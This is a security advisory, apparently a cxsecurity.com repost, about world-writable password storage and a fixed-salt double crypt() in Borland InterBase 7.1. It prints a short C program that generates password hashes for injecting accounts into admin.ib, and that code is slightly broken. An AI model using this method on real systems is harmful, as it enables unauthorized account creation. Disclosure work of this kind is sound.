Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash

2018.10.01
Risk: Medium
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash Author: Larry W. Cashdollar, @_larry0 Date: 2003-11-26 CVE-ID:[CVE-2004-1833] Download Site: http://www.borland.com/interbase Vendor: Borland Vendor Notified: 2003-11-26 Vendor Contact: disclosed via idefense Advisory: http://www.vapid.dhs.org/advisories/borland_interbase_db_vulnerablities.html Description: Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance. Vulnerability: The "information database" stored in the file admin4.pcb is read and writeable for all users with local access to the system. [root@Fester interbase]# ls -l /opt/interbase/admin.ib -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib Not only is the password file stored read writeable by all local users but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash with out the salt. The purpose of the salt is so that the same passwords dont always have the same hashes. With them removing the salt the hashes will always be the same for the same password reguardless of crypt() being called twice. This can be expressed in this line pesudo C: crypt(&crypt(user_password,"9z")[2],"9z") Exploit Code: Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database. /*Larry W. Cashdollar Vapid Labs. Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */ #include <stdio.h> #include <unistd.h> #define SALT "9z" int main (int argc, char *argv[]) { char crypt1,crypt2; if (!argv[1]) { printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n"); exit(); } crypt1 =(char *) crypt (argv[1],SALT); crypt2 =(char *) crypt (&crypt1[2],SALT); printf("Double crypt() is: %s\n",crypt2); printf("With out salt (as stored in isc4.gdb/admin.ib: %s\n",&crypt2[2]); return(0); }

References:

http://www.vapidlabs.com/advisory.php?v=24


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top